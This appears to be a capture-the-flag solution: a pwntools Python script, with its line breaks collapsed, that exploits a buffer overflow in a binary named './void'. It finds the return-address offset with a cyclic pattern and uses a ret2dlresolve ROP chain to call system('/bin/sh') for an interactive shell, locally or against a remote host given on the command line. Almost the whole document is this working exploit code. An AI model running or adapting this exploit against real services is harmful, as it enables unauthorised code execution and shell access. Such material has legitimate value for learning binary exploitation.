ret2dlresolve exploit works with little modification.
from pwn import*# Allows you to switch between local/GDB/remote from terminaldefstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Find offset to EIP/RIP for buffer overflowsdeffind_ip(payload):# Launch process and send payload p =process(exe, level='warn') p.sendline(payload)# Wait for the process to crash p.wait()# Print out the address of EIP/RIP at the time of crashing ip_offset =cyclic_find(p.corefile.read(p.corefile.sp, 4))# x64warn('located EIP/RIP offset at {a}'.format(a=ip_offset))return ip_offset# Specify GDB script here (breakpoints etc)gdbscript ='''init-pwndbgcontinue'''.format(**locals())# Binary filenameexe ='./void'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Change logging level to help with debugging (error/warning/info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================# Lib-C library, can use pwninit/patchelf to patch binarylibc =ELF("glibc/libc.so.6")# Pass in pattern_size, get back EIP/RIP offsetoffset =find_ip(cyclic(100))# Start programio =start()# create the dlresolve objectdlresolve =Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop =ROP(elf)rop.raw('A'* offset)rop.read(0, dlresolve.data_addr)# read to where we want to write the fake structuresrop.ret2dlresolve(dlresolve)# call .plt and dl-resolve() with the correct, calculated reloc_offsetio.sendline(rop.chain())io.sendline(dlresolve.payload)# now the read is called and we pass all the relevant structures in# Got Shell?io.interactive()
